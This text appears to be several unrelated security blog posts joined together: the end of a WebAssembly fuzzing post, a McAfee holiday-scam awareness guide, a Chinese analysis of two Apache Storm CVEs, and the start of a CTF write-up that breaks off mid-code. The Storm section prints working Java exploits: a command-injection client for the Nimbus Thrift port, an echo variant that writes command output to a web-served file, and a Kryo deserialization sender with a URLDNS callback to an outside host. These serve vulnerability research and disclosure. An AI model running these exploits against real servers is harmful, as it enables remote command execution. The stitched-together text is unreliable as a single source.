First, in order to differentiate our logic from Dharma logic - Dharma provides a common.dg
file which you can find in the following path: dharma/grammars/common.dg
. This file contains helpful logic, such as digit
which will give you a number between 0-9, and short_int
which will give you a number between 0-65535. This file is useful but generic and sometimes we need something more specific to our logic. That said, we ended up creating our own logic:
We also decided to go with different naming conventions, so we can utilize the auto-complete feature of our text editor. Dharma uses snake_case for naming, we decided to go with Camel Case naming instead.
Also, for our coding style, we decided to use some sort of prefix and postfix to annotate the logic. Let's take variables for example, we start any variable with var
followed by class or function name:
This is will make it easy to use later and would make it easier to understand in general.
We applied the same concept for parameters as well. We start with the function's name followed by Param as a naming convention:
Since we're mentioning parameters, let's go over an example of an idea we mentioned earlier. If a function has one or more optional parameters, we create a section for it to cover all the possibilities:
Therefor our coding style, we used comments to divide the file into sections so we can group and reach a certain function easily:
That said, you can easily find certain functions or parameters under its related section. This is a fairly good solution to make the file more manageable. At a certain point you have to make a file for each section, and group shared logic on an abstract shared file so you eliminate the duplication - maybe we'll talk about this on another blog (maybe not xD).
Testing and validation
After we finish the first version of our Dharma logic file we ran it, and noticed a lot of JavaScript logical errors. Small mistakes that we make normally do, like forgetting a bracket or a comma etc.. To solve these error we created a builder section were we build our logic there:
We had to go through each line one by one to eliminate all the possible logical errors. We also created a wrapper function that wraps the code with try-catch blocks:
By doing so, we made it much easier to isolate and test the possible output.
While we were working on the Dharma logic file we faced another issue. When you want your JavaScript to import something from the .wasm
(eg. a table or a memory buffer) you have to provide it from the .wasm
module. For that, we ended up making many modules that provide whatever we import from generated JS logic, and export whatever we import from .wasm
modules. In brief, to do that we built a lot of .wasm
modules, each one exports or imports what JavaScript needs to test an API. An example of this logic:
For that to work, you need the following .wasm
file:
So if JavaScript is looking for the main function you should have a main function inside your .wasm
module. Also, as we mentioned, there are many things to check like import/export table, import/export buffer, functions, and global variables. We'll have to combine many of them together, but some of them we couldn't like tables. You can only have one on your program either exported or imported. That said, we had to separate them into different modules and avoid some of them to reduce complexity.
After finishing our first version, we went to the chromium bug tracker which appears to be a great place to expand our logic to find more smart, complex tips and tricks. We used some of the snippets there as it is, and some of them with little modification. Also it's worth mentioning that, when you search you should apply the filter that is related to your area of interest. In our case we looked into all bugs that have Type of 'Bug-Security' and the component is Blink>JavaScript>WebAssembly, you can use this line on the search bar.
While we were reading these issues on the bug tracker, we found this bug that could be produced by our Dharma logic (if we were a bit faster xD)
WebAssembly Module
Now that we're done fuzzing the first two components, we can move on to the last component of WebAssembly, which is the module.
Everything that we did earlier was related to fuzzing the APIs and JavaScript's grammar, but we found two interesting functions used to compile and ensure the validity of that module, compile
and validate
functions. Both of these two function receive a .wasm
module. The first function compiles WebAssembly binary code into a WebAssembly module, the second function returns whether the bytes from a .wasm
module are valid (true
) or not (false
).
For both compile
and validate
, we made a .wasm
corpus (by building or collecting), then we used Radamsa to mutate the binary of these files before we imported them from our two functions.
We improved the mutation by skipping the first part of the .wasm
module which contains the header of the file (magic number and version), and start to mutate the actual wat
instructions.
Stay tuned for the final part of our Dharma blog series, where we implement more advanced grammar files. Happy Hunting!!
‘Tis the Season for Scams
Co-authored by: Sriram P and Deepak Setty
‘Tis the season for scams. Well, honestly, it’s always scam season somewhere. In 2020, the Internet Crime and Complaint Center (IC3) reported losses in excess of $4.1 billion dollars in scams which was a 69% increase over 2019. There is no better time for a scammer celebration than Black Friday, Cyber Monday, and the lead-up to Christmas and New Year. It’s a predictable time of the year, which gives scammers ample time to plan and organize. The recipe isn’t complicated, at the base we have some holiday excitement, sprinkle in fake shopping deals and add some discounts, and ho ho ho we have social engineering scams.
In this blog, we want to increase awareness related to scams as we expect elevated activity during this holiday season. The techniques used to scam folks are very similar to those used to spread malware too, so always be alert and use caution when browsing and shopping online. We will provide some examples to help educate consumers on how to identify scams. The victims of such scams can be others around you like your kids or parents, so read up and spread the word with family and friends. Awareness, education, and being alert are key to keeping you at bay from fraudsters.
Relevant scams this season
Although there is a myriad of scams out there, we expect the most common scams and targets this season to be:
- Non-delivery scams – Fake online stores will attempt to get you to purchase items that you will never end up receiving
- Deals that get shoppers excited. Supply chain issues recently will give scammers more fodder. Scammers can place bait deals on popular items
- Elderly parents/grandparents looking for cheap medical equipment, medical memberships, or looking to purchase and ship their grandchildren presents for the holidays.
- Emotionally vulnerable people might fall prey to romance scams
- Children looking for free, Fortnite Vbucks and other gaming credits may fall prey to scams and could even get infected with potentially unwanted programs
- Charity scams will be rampant.
SMSishing, email-based Phishing, and push notifications will be the most common vectors initiating scams during this holiday season. Here are some common tactics in use today:
1. Unbelievable deals or discounts
This is a common theme around this time of the year. Deals, discounts, and gift cards can be costly to your bank account. Be wary of URLs being presented to you over email or SMS. Phishing emails, bulk mailing, texting, and typo-squatting are some of the ways that scammers target their prey.
2. Creating a sense of urgency
Scammers will create a sense of urgency by telling you that you have limited time to claim the deal or that there is low inventory for popular items in their store. It’s not difficult for scammers to identify sought-after electronics items or holiday gifts for sale and offer them for sale on their fake stores. Such scams are believable given the supply chain challenges and delivery shortages over the last few months.
3. Utilizing Scare tactics
Getting people worried about a life-changing event or disrupting travel plans can be concerning. So, if you get an unexpected call from someone claiming to be from the FBI, police, IRS, or even a travel company, stop and think. They may be using scare tactics to dupe you. Never divulge personal information and if in doubt, ask them a lot of directed questions and fact check them. As an example, check to see if they know your home address, account number, itinerary number, or bank balance depending on who they claim to be. Scammers typically don’t have specific details and when put on the spot, they’ll hang up.
4. Emotional tactics
Like scare tactics, scammers may prey on vulnerable people. Although there can be many variations of such scams, the more common ones are Romance Scams where you end up connecting to someone with a fake profile, and Fake Charity Scams where you receive a phone call or an email requesting a donation. Do not entertain such requests over the phone especially if you receive a phone call soliciting a donation. During the conversation, they will attempt to make you feel guilty or selfish for not contributing enough. Remember, there is no rush to donate. Go to a reputable website or a known organization and donate if you must after due diligence.
Tips to identify a scam
Successful scams are situationally accurate. You may be the smartest guy in the room, but when you eagerly waiting for that delivery and you see an email update claiming a delivery delay from UPS, you might fall for a scam. This is particularly true in the holiday season and therefore such themes are more prevalent. Here are some tips on how to identify scams early on.
- Be suspicious of anything that is pushed to you from an unknown source – emails, SMS, advertisements, phone calls, surveys, social media. This is when you are being solicited to do something you might not have otherwise chosen to
- Avoid going to unknown websites to begin with. You always have the option to r before you click on a link. You can always use some of the following trusted free resources to validate a domain or business
- https://trustedsource.org/ – to look up a URL
- https://www.virustotal.com/gui/home/url – to look up a URL
- https://www.bbb.org/ – to validate a business, charity, etc
- https://whois.domaintools.com/ – to look up site history. A new or recent domain is less trustworthy. Scammers register new domains based on the theme of their scams.
- If you do end up navigating, look for the following to build trust in a link:
- Ensure it’s an “https” domain versus an “http”. A valid “https” certificate just means that your data is encrypted enroute to the website. Although this method isn’t indicative of a scam, some scams are hosted on compromised “http” sites. (example 1))
- Closely look at the domain name. They might be indicative of fakes. Scammers would typically register domains with very similar names to deceive you. For example, Amazon.com could be replaced by Arnazon.com or AMAZ0N.com. ‘vv’ could be replaced for ‘w’, ‘I’ for a 1, etc. Same goes for emails you receive – take a close look
- Another common way of reaching a fake website is due to “typosquatting” but this is typically human error, where a user may type an incorrect domain name and reach a fake site.
- Most legit sites will have a “Contact us”, “About Us”, “Conditions of Use”, “Privacy Notice”/”Terms”, “Help”, Social Media presence on Twitter, FB, Instagram, etc. Read up on the pages to learn about the website and even look for website reviews before you make a purchase. Fake websites do not invest a lot of time to populate these – this could be a giveaway.
- Always confirm the sender of and email or text by validating the email address or phone number. For example, if an email claims to be from BankOfAmerica, you would expect their email domain in most cases to be from “@bankofamerica.com” and not from “@gmail.com”. Avoid clicking on links from emails or messages when you don’t know the sender.
- If you end up linking to a page because of an email or message, never provide personal details. Any site asking for such information should raise red flags. Even if the site looks legit, Phishing scammers make exact replicas of web pages and try to get you to login. This allows them to steal your login credentials. (Example 4)
- Don’t feel pressured to click on a link or provide details to solicitors in such cases especially. Any attempt to gather personal data is a big NO.
- Never open attachments from unknown people. Emails with document attachments or PDF Attachments are very popular in spreading malware. The attachment names are typically very enticing to click on. Names like “invoice.pdf”, “receipt.doc”, “Covid-19 test results.doc”, etc. may invite some curiosity but could also lead to malware.
- Ensure you review the hyperlink before you click them. It’s easy to fake the text and get you to an illegit page (Example 2)
- Anyone who insists on payments using a pre-paid gift card or wire transfer, instead of your typical credit card is most likely attempting to scam you.
- Avoid going to unknown websites to begin with. You always have the option to r before you click on a link. You can always use some of the following trusted free resources to validate a domain or business
- The end goal of a scammer is that they want to make money – so be alert with your cards and their activity.
- Avoid using Debit Cards online. Use a prepaid or virtual Credit Card or even better utilize Apple Pay, Google Pay or PayPal for online payments. Payment card services today have advanced fraud monitoring systems
- Check CC statements often to look for any unanticipated charges.
- If you make a purchase, ensure you have a tracking number and monitor shipments
- Disable international purchases if you know you won’t be traveling.
- Never wire money directly to anyone you do not know.
What if you are a victim?
If you believe that you have been a victim of a scam, here are a few tips that might help.
- First, get in touch with your Credit Card company and tell them to put a hold on your card. You can dispute any suspicious charges and request an issue of a chargeback
- If you have been scammed through popular sites like ebay.com or amazon.com – contact them directly. If you wired money, contact the wire company directly
- File a Police Report. If you gave your personal information away, you might want to go to
- Notify and contribute – build awareness
Example scams:
Example 1: Fake SMS messages
It’s become more common recently to receive text messages for scammers. The following few text messages demonstrate SMSishing attempts.
- The first is an attempt to gather Bank Of America details. For the scammer, it’s a shot in the dark. Given, the target is a US number, he attempts to use the phone number that he is sending the text to, as a bank account number and provides a link to a bit.ly page (a URL shortening service) to link to a fake page that poses as a Bank of America login. A successful SMSish would be if the victim entered their details.
2. The following are fake texts that attempt to entice you click the link. The bait is the Gift card. One can tell that they are a similar theme since they originate from fake phone numbers, which are very similar but not exact. The domain names of the two URLs are totally random (probably compromised URLs). You can tell that back in October, the full URL based SMShing attempts were not very effective which is why in Nov, they probably used keywords like “COSTCO” and “ebay” within the URL and inline to their SMS context, to make it more likely for people to click.
Also note that some of the URLs only have an “http” versus a “https”, something we had noted earlier in the blog.
Example 2: Fake email link
One cannot trust an email by the text. You should review the link to ensure it takes you to where it claims to. The following is an example email where the link is not what it claims to be.
Example 3: Fake Store Scam hosted on Shopify
Shopify is a Canadian multinational e-commerce company. It offers online retailers a suite of services, including payments, marketing, shipping, and customer engagement tools.
So, where there is money to be made, individuals are looking to take advantage. Shopify scam targets both consumers and business owners. Scammer abuse the power of e-commerce to earn money by implementing fake stores. They observe the product or category, create an attractive logo or image and promote extensively on social media.
Fake Bike Online Purchase store – Mountain-ranger-com
Site: hxxps://mountain-ranger-com.myshopify.com/collections/all
SSL info:
This site is hosted on Shopify, so it has a valid SSL cert which is the first thing we check on where we transact.
Whois Record ( last updated on 2021-11-19 )
Domain Name: myshopify.com
Registry Domain ID: 362759365_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.markmonitor.com
Registrar URL: http://www.markmonitor.com
Updated Date: 2021-03-02T23:39:12+0000
Creation Date: 2006-03-03T03:01:37+0000
Registrar Registration Expiration Date: 2024-03-02T08:00:00+0000
Registrar: MarkMonitor, Inc.
Registrar IANA ID: 292
Registrar Abuse Contact Email:
Registrar Abuse Contact Phone: +1.2083895770
Domain Status: clientUpdateProhibited (https://www.icann.org/epp#clientUpdateProhibited)
Domain Status: clientTransferProhibited (https://www.icann.org/epp#clientTransferProhibited)
Domain Status: clientDeleteProhibited (https://www.icann.org/epp#clientDeleteProhibited)
Domain Status: serverUpdateProhibited (https://www.icann.org/epp#serverUpdateProhibited)
Domain Status: serverTransferProhibited (https://www.icann.org/epp#serverTransferProhibited)
Domain Status: serverDeleteProhibited (https://www.icann.org/epp#serverDeleteProhibited)
Registrant Organization: Shopify Inc.
Registrant State/Province: ON
Registrant Country: CA
Registrant Email: Select Request Email Format
The registrar info for the site is valid too, as it is hosted on Shopify. If you look closer, however, one will notice red flags:
- Compare these prices listed on other known sites like amazon: Price listed on the fake site versus price listed on Amazon. This is an “unbelievable” deal.
Examples of similar sites showing incredible discounts.
2. The “About Us” doesn’t make much sense when you see the products that are being offered:
A quick google on the text shows that multiple sites are using the same exact text (most of them probably fake)
3. There are no customer reviews about the products listed.
4. It has a public email server (gmail) in its return policy
5. Looking up the list address in google maps wouldn’t show up anything and looking up the number in apps like true caller shows it’s fake.
Example 4: Social Engineering to Steal Credentials
The goal of this scam is to steal credentials however it could as well be used as a malware delivery mechanism. The screenshot is that of a fake business proposal hosted on OneDrive Cloud for phishing purposes.
The actor aims to mislead the user into clicking on the above reference link. When the user clicks on the link, it redirects to a different website that displays the below fake OneDrive screenshot.
hxxps://aidaccounts[.]com/11/verified/22/
If a user enters their OneDrive details, the actors receive them at their backend. This means that this victim has lost their login credentials to the phishing actors. Look at the address bar and trust your instincts. This is in no way related to Microsoft OneDrive. There are other such examples where they do some additional plumbing of the URL to include keywords that make it more believable – as they did in the SMSishing example above.
Example 5: Fake Push Notification for surveys
The goal here is to get the user to accept push notifications. Doing so makes the customer susceptible to other possible scams. In this example, the scammers attempt to get users to fill out surveys. Legit companies online pay users for surveys. A referral code is used to pay the survey taker. The scammer in this case attempts to get others to fill the survey on their behalf and therefore makes money when such surveys use the scammer’s referral code. Push notifications are used to get the victims to fill out surveys. Previous blogs from McAfee demonstrate similar scams and how to prevent such notifications
The initial vector comes to the victim via a spam email with a PDF Spam attachment. In this scenario, Gmail was used as the sender.
Upon opening the PDF, a fake online PUBG (Players Unknown Battleground) credits generator gets opened. In PUBG, Gamers need credits to participate in various online games and so this scam baits them offering free credits.
Once the user clicks on the bait URL, it opens a google feed proxy URL.
Malicious websites are destined to be block-listed and therefore have short shelf lives. Google’s feed proxy redirects them in adapting to new URLs and therefore utilizes a fast-flux mechanism as a technique to keep the campaign alive. Usage of feed proxy are not new and we have highlighted its use in the past by the hancitor botnet.
Clicking on the top highlighted URL, it navigates to a webpage that poses as a PUBG Arcane online credit generator.
To make the online generator look real, the website has added fake recent activities highlighting coins users have earned via this generator. Even the add comments section is fake.
Clicking on continue will bring up a fake progress bar. Now the site shows the coins and cash are ready, however, an automated human verification has failed, and a survey has to be taken up for getting the reward.
A clickable link for this verification is also loaded. Once clicked, a small dialog with 3 options are presented.
Clicking on “want to become a millionaire” loaded a survey page and prompts you to take it up. It will also prompt you to allow push notifications from this website.
Once you click on “Allow”, notifications to take up a survey or fake personalized offer notifications start popping up. Be it on your desktop or on your mobile, these notifications pop-ups to take up more surveys.
Clicking on the other links too from “Human Verification”, you will realize that you have finally ended up not gaining anything for your PUBG Arcane gaming, but ended up taking surveys.
Here is another example of a PDF theme we have seen as a lure on the Lenovo tablet offer.
Clicking on this link takes the user to a page that claims it has been protected by a technique to block bots. Persuading you to click on the allow button for enabling popups.
Once you click on the enable button, it then redirects the browser to take up a random survey. In our case, the survey was on household income.
Another such theme that we observed was around the latest Netflix series – Squid games. Although Series 1 has currently been released, the fake email prompts early access to Season 2.
Scammers spend a lot of time and effort tweaking and tuning their schemes to make it fit just right for you. Avoiding a scam is not full proof but being vigilant is key. Don’t get overly keen when you get offers thrown at you this season. Take a step back, relax and think it through, not only should you do your own research, but you should also trust your instincts. Spending a little extra on products or making donations to a reputable and known organization might be worth the peace of mind during the holidays. Help educate your family and contribute by reporting scams.
Happy Holidays!
The post ‘Tis the Season for Scams appeared first on McAfee Blog.
Apache Storm 漏洞分析
Author: 0x28
0x00 前言
前段时间Apache Storm更了两个CVE,简短分析如下,本篇文章将对该两篇文章做补充。
GHSL-2021-086: Unsafe Deserialization in Apache Storm supervisor - CVE-2021-40865
GHSL-2021-085: Command injection in Apache Storm Nimbus - CVE-2021-38294
0x01 漏洞分析
CVE-2021-38294 影响版本为:1.x~1.2.3,2.0.0~2.2.0
CVE-2021-40865 影响版本为:1.x~1.2.3,2.1.0,2.2.0
CVE-2021-38294
1、补丁相关细节
针对CVE-2021-38294命令注入漏洞,官方推出了补丁代码https://github.com/apache/storm/compare/v2.2.0...v2.2.1#diff-30ba43eb15432ba1704c2ed522d03d588a78560fb1830b831683d066c5d11425
将原本代码中的bash -c 和user拼接命令行执行命令的方式去掉,改为直接传入到数组中,即使user为拼接的命令也不会执行成功,带入的user变量中会直接成为id命令的参数。说明在ShellUtils类中调用,传入的user参数为可控
因此若传入的user参数为";whomai;",则其中getGroupsForUserCommand拼接完得到的String数组为
new String[]{"bash","-c","id -gn ; whoami;&& id -Gn; whoami;"}
而execCommand方法为可执行命令的方法,其底层的实现是调用ProcessBuilder实现执行系统命令,因此传入该String数组后,调用bash执行shell命令。其中shell命令用户可控,从而导致可执行恶意命令。
2、execCommand命令执行细节
接着上一小节往下捋一捋命令执行函数的细节,ShellCommandRunnerImpl.execCommand()的实现如下
execute()往后的调用链为execute()->ShellUtils.run()->ShellUtils.runCommand()
最终传入shell命令,调用ProcessBuilder执行命令。
3、调用栈执行流程细节
POC中作者给出了调试时的请求栈。
getGroupsForUserCommand:124, ShellUtils (org.apache.storm.utils)getUnixGroups:110, ShellBasedGroupsMapping (org.apache.storm.security.auth)getGroups:77, ShellBasedGroupsMapping (org.apache.storm.security.auth)userGroups:2832, Nimbus (org.apache.storm.daemon.nimbus)isUserPartOf:2845, Nimbus (org.apache.storm.daemon.nimbus)getTopologyHistory:4607, Nimbus (org.apache.storm.daemon.nimbus)getResult:4701, Nimbus$Processor$getTopologyHistory (org.apache.storm.generated)getResult:4680, Nimbus$Processor$getTopologyHistory (org.apache.storm.generated)process:38, ProcessFunction (org.apache.storm.thrift)process:38, TBaseProcessor (org.apache.storm.thrift)process:172, SimpleTransportPlugin$SimpleWrapProcessor (org.apache.storm.security.auth)invoke:524, AbstractNonblockingServer$FrameBuffer (org.apache.storm.thrift.server)run:18, Invocation (org.apache.storm.thrift.server)runWorker:-1, ThreadPoolExecutor (java.util.concurrent)run:-1, ThreadPoolExecutor$Worker (java.util.concurrent)run:-1, Thread (java.lang)
根据以上在调用栈分析时,从最终的命令执行的漏洞代码所在处getGroupsForUserCommand仅仅只能跟踪到nimbus.getTopologyHistory()方法,似乎有点难以判断道作者在做该漏洞挖掘时如何确定该接口对应的是哪个服务和端口。也许作者可能是翻阅了大量的文档资料和测试用例从而确定了该接口,是如何从某个端口进行远程调用。
全文搜索6627端口,找到了6627在某个类中,被设置为默认值。以及结合在细读了Nimbus.java的代码后,关于以上疑惑我的大致分析如下。
Nimbus服务的启动时的步骤我人为地将其分为两个步骤,第一个是读取相应的配置得到端口,第二个是根据配置文件开启对应的端口和绑定相应的Service。
首先是启动过程,前期启动过程在/bin/storm和storm.py中加载Nimbus类。在Nimbus类中,main()->launch()->launchServer()后,launchServer中先实例化一个Nimbus对象,在New Nimbus时加载Nimbus构造方法,在这个构造方法执行过程中,加载端口配置。接着实例化一个ThriftServer将其与nimbus对象绑定,然后初始化后,调用serve()方法接收传过来的数据。
Nimbus函数中通过this调用多个重载构造方法
在最后一个构造方法中发现其调用fromConf加载配置,并赋值给nimbusHostPortInfo
fromConf方法具体实现细节如下,这里直接设置port默认值为6627端口
然后回到主流程线上,server.serve()开始接收请求
至此已经差不多理清了6627端口对应的服务的情况,也就是说,因为6627端口绑定了Nimbus对象,所以可以通过对6627端口进行远程调用getTopologyHistory方法。
4、关于如何构造POC
根据以上漏洞分析不难得出只需要连接6627端口,并发送相应字符串即可。已经确定了6627端口服务存在的漏洞,可以通过源代码中的的测试用例进行快速测试,避免了需要大量翻阅文档构造poc的过程。官方poc如下
import org.apache.storm.utils.NimbusClient;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;
public class ThriftClient {
public static void main(String[] args) throws Exception {
HashMap config = new HashMap();
List<String> seeds = new ArrayList<String>();
seeds.add("localhost");
config.put("storm.thrift.transport", "org.apache.storm.security.auth.SimpleTransportPlugin");
config.put("storm.thrift.socket.timeout.ms", 60000);
config.put("nimbus.seeds", seeds);
config.put("storm.nimbus.retry.times", 5);
config.put("storm.nimbus.retry.interval.millis", 2000);
config.put("storm.nimbus.retry.intervalceiling.millis", 60000);
config.put("nimbus.thrift.port", 6627);
config.put("nimbus.thrift.max_buffer_size", 1048576);
config.put("nimbus.thrift.threads", 64);
NimbusClient nimbusClient = new NimbusClient(config, "localhost", 6627);
// send attack
nimbusClient.getClient().getTopologyHistory("foo;touch /tmp/pwned;id ");
}
}
在测试类org/apache/storm/nimbus/NimbusHeartbeatsPressureTest.java中,有以下代码针对6627端口的测试
可以看到实例化过程需要传入配置参数,远程地址和端口。配置参数如下,构造一个config即可。
并且通过getClient().xxx()对相应的方法进行调用,如下图中调用sendSupervisorWorkerHeartbeats
且与getTopologyHistory一样,该方法同样为Nimbus类的成员方法,因此可以使用同样的手法对getTopologyHistory进行远程调用
CVE-2021-40865
1、补丁相关细节
针对CVE-2021-40865,官方推出的补丁代码,对传过来的数据在反序列化之前若默认配置不开启验证则增加验证(https://github.com/apache/storm/compare/v2.2.0...v2.2.1#diff-463899a7e386ae4ae789fb82786aff023885cd289c96af34f4d02df490f92aa2),即默认开启验证。
通过查阅资料可知ChannelActive方法为连接时触发验证
可以看到在旧版本的代码上的channelActive方法没有做登录时的登录验证。且从补丁信息上也可以看出来这是一个反序列化漏洞的补丁。该反序列化功能存在于StormClientPipelineFactory.java中,由于没做登录验证,导致可以利用该反序列化漏洞调用gadget执行系统命令。
2、反序列化漏洞细节
在StormClientPipelineFactory.java中数据流进来到最终进行处理需要经过解码器,而解码器则调用的是MessageCoder和KryoValuesDeserializer进行处理,KryoValuesDeserializer需要先进行初步生成反序列化器,最后通过MessageDecoder进行解码
最终在数据流解码时触发进入MessageDecoder.decode(),在decode逻辑中,作者也很精妙地构造了fake数据完美走到反序列化最终流程点。首先是读取两个字节的short型数据到code变量中
判断该code是否为-600,若为-600则取出四个字节作为后续字节的长度,接着去除后续的字节数据传入到BackPressureStatus.read()中
并在read方法中对传入的bytes进行反序列化
3、调用栈执行流程细节
尝试跟着代码一直往上回溯一下,找到开启该服务的端口
Server.java - new Server(topoConf, port, cb, newConnectionResponse);
WorkerState.java - this.mqContext.bind(topologyId, port, cb, newConnectionResponse);
Worker.java - loadWorker(IStateStorage stateStorage, IStormClusterState stormClusterState,Map<String, String> initCreds, Credentials initialCredentials)
LocalContainerLauncher.java - launchContainer(int port, LocalAssignment assignment, LocalState state)
Slot.java - run()
ReadClusterState.java - ReadClusterState()
Supervisor.java - launch()
Supervisor.java - launchDaemon()
而在Supervisor.java中先实例化Supervisor,在实例化的同时加载配置文件(配置文件storm.yaml配置6700端口),然后调用launchDaemon进行服务加载
读取配置文件细节为会先调用ConfigUtils.readStormConfig()读取对应的配置文件
ConfigUtils.readStormConfig() -> ConfigUtils.readStormConfigImpl() -> Utils.readFromConfig()
可以看到调用findAndReadConfigFile读取storm.yaml
读取完配置文件后进入launchDaemon,调用launch方法
在launch中实例化ReadClusterState
在ReadClusterState的构造方法中会依次调用slot.start(),进入Slot的run方法。最终调用LocalContainerLauncher.launchContainer(),并同时传入端口等配置信息,最终调用new Server(topoConf, port, cb, newConnectionResponse),监听对应的端口和绑定Handler。
4、关于POC构造
import org.apache.commons.io.IOUtils;
import org.apache.storm.serialization.KryoValuesSerializer;
import ysoserial.payloads.ObjectPayload;
import ysoserial.payloads.URLDNS;
import java.io.*;
import java.math.BigInteger;
import java.net.*;
import java.util.HashMap;
public class NettyExploit {
/**
* Encoded as -600 ... short(2) len ... int(4) payload ... byte[] *
*/
public static byte[] buffer(KryoValuesSerializer ser, Object obj) throws IOException {
byte[] payload = ser.serializeObject(obj);
BigInteger codeInt = BigInteger.valueOf(-600);
byte[] code = codeInt.toByteArray();
BigInteger lengthInt = BigInteger.valueOf(payload.length);
byte[] length = lengthInt.toByteArray();
ByteArrayOutputStream outputStream = new ByteArrayOutputStream( );
outputStream.write(code);
outputStream.write(new byte[] {0, 0});
outputStream.write(length);
outputStream.write(payload);
return outputStream.toByteArray( );
}
public static KryoValuesSerializer getSerializer() throws MalformedURLException {
HashMap<String, Object> conf = new HashMap<>();
conf.put("topology.kryo.factory", "org.apache.storm.serialization.DefaultKryoFactory");
conf.put("topology.tuple.serializer", "org.apache.storm.serialization.types.ListDelegateSerializer");
conf.put("topology.skip.missing.kryo.registrations", false);
conf.put("topology.fall.back.on.java.serialization", true);
return new KryoValuesSerializer(conf);
}
public static void main(String[] args) {
try {
// Payload construction
String command = "http://k6r17p7xvz8a7wj638bqj6dydpji77.burpcollaborator.net";
ObjectPayload gadget = URLDNS.class.newInstance();
Object payload = gadget.getObject(command);
// Kryo serialization
byte[] bytes = buffer(getSerializer(), payload);
// Send bytes
Socket socket = new Socket("127.0.0.1", 6700);
OutputStream outputStream = socket.getOutputStream();
outputStream.write(bytes);
outputStream.flush();
outputStream.close();
} catch (Exception e) {
e.printStackTrace();
}
}
}
其实这个反序列化POC构造跟其他最不同的点在于需要构造一些前置数据,让后面被反序列化的字节流走到反序列化方法中,因此需要先构造一个两个字节的-600数值,再构造一个四个字节的数值为序列化数据的长度数值,再加上自带序列化器进行构造的序列化数据,发送到服务端即可。
0x02 复现&回显Exp
CVE-2021-38294
复现如下
调试了一下EXP,由于是直接的命令执行,因此直接采用将执行结果写入一个不存在的js中(命令执行自动生成),访问web端js即可。
import com.github.kevinsawicki.http.HttpRequest;
import org.apache.storm.generated.AuthorizationException;
import org.apache.storm.thrift.TException;
import org.apache.storm.thrift.transport.TTransportException;
import org.apache.storm.utils.NimbusClient;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.List;
public class CVE_2021_38294_ECHO {
public static void main(String[] args) throws Exception, AuthorizationException {
String command = "ifconfig";
HashMap config = new HashMap();
List<String> seeds = new ArrayList<String>();
seeds.add("localhost");
config.put("storm.thrift.transport", "org.apache.storm.security.auth.SimpleTransportPlugin");
config.put("storm.thrift.socket.timeout.ms", 60000);
config.put("nimbus.seeds", seeds);
config.put("storm.nimbus.retry.times", 5);
config.put("storm.nimbus.retry.interval.millis", 2000);
config.put("storm.nimbus.retry.intervalceiling.millis", 60000);
config.put("nimbus.thrift.port", 6627);
config.put("nimbus.thrift.max_buffer_size", 1048576);
config.put("nimbus.thrift.threads", 64);
NimbusClient nimbusClient = new NimbusClient(config, "localhost", 6627);
nimbusClient.getClient().getTopologyHistory("foo;" + command + "> ../public/js/log.min.js; id");
String response = HttpRequest.get("http://127.0.0.1:8082/js/log.min.js").body();
System.out.println(response);
}
}
CVE-2021-40865
复现如下
该利用暂时没有可用的gadget配合进行RCE。
0x03 写在最后
由于本次分析时调试环境一直起不来,因此直接静态代码分析,可能会有漏掉或者错误的地方,还请师傅们指出和见谅。
0x04 参考
https://www.w3cschool.cn/apache_storm/apache_storm_installation.html
https://securitylab.github.com/advisories/GHSL-2021-086-apache-storm/
https://securitylab.github.com/advisories/GHSL-2021-085-apache-storm/
https://www.leavesongs.com/PENETRATION/commons-beanutils-without-commons-collections.html
https://github.com/frohoff/ysoserial
https://www.w3cschool.cn/apache_storm/apache_storm_installation.html
The InfoSecurity Challenge 2021 Full Writeup: Battle Royale for $30k
Introduction
From 29 October to 14 November 2021, the Centre for Strategic Infocomm Technologies (CSIT) ran The InfoSecurity Challenge (TISC), an individual competition consisting of 10 levels that tested participants' cybersecurity and programming skills. This format created a big departure from last year's iteration (you can read my writeup here), which was a timed 48 hour challenge focused primarily on reverse engineering and binary exploitation.
Now with two weeks and 10 levels, the difficulty and variety of the challenges greatly increased. As you would expect, the prize pool grew accordingly – instead of $3,000 in vouchers in 2020, it was now $30,000 in cold hard cash. Participants unlocked the prize money in increments of $10,000 from level 8 to 10, with successful solvers splitting the pool equally. For example, if there was only one solver for level 10, they would claim the full $10,000 for themselves.
Hmm... why does this sound so familiar?
However, since I was playing for charity, I was more interested in testing my skills, particularly in the binary exploitation domain. I placed 6th in the previous TISC and wanted to see what difference a year of learning had made.
I spent more than a hundred hours cracking my head against seemingly impossible tasks ranging from web, mobile, steganography, binary exploitation, custom shellcoding, cryptography and more. Levels 8 to 10 combined multiple domains and each one felt like a mini-CTF. While I considered myself reasonably proficient in web, I stepped way out of my comfort zone tackling the broad array of domains, especially as an absolute beginner in pwn, forensics, and steganography. Since I could only unlock each level by completing the previous one, I forced myself to learn new techniques every time.
I took away important lessons for both CTFs and day-to-day red teaming that I hope others will find useful as well. What distinguished TISC from typical CTFs was its dual emphasis on hacking AND programming – rather than exploiting a single vulnerability, I often needed to automate exploits thousands of times. You'll see what I mean soon.
Let's dive into the challenges. You may want to skip the earlier levels as they were fairly basic. You should definitely read levels 8-10, but honestly every challenge from level 3 onwards is interesting.
- Introduction
- Level 1: Scratching the Surface
- Level 2: Dee Na Saw as a need
- Level 3: Needle in a Greystack
- Level 4: The Magician's Den
- Level 5: Need for Speed
- Level 6: Knock Knock, Who's There
- Level 7: The Secret
- Level 8: Get-Shwifty
- Level 9: 1865 Text Adventure
- Level 10: Malware for UwU
- Conclusion
Level 1: Scratching the Surface
I warmed up on basic forensics and steganography challenges.
Part 1
Domains: Forensics
We've sent the following secret message on a secret channel.
Submit your flag in this format: TISC{decoded message in lower case}
file1.wav
The phrase “secret channel” suggested data smuggling via an audio channel, a common steganography technique. file1.wav
played a cheery tune that I could not recognise. I quickly applied common tools and techniques like binwalk
as described in this Medium article but found nothing. I even tried XORing both channels:
import wave
import struct
wav = wave.open("file1.wav", mode='rb')
frame_bytes = bytearray(list(wav.readframes(wav.getnframes())))
shorts = struct.unpack('H'*(len(frame_bytes)//2), frame_bytes)
shorts_three = struct.unpack('H'*(len(frame_bytes)//4), frame_bytes)
extracted_left = shorts[::2]
extracted_right = shorts[1::2]
print(len(extracted_left))
print(len(extracted_right))
extracted_secret = shorts[2::3]
print(len(extracted_secret))
extractedLSB = ""
for i in range(0, len(extracted_left)):
extractedLSB += str((extracted_left[i] & 1) ^ (extracted_right[i] & 1))
string_blocks = (extractedLSB[i:i+8] for i in range(0, len(extractedLSB), 8))
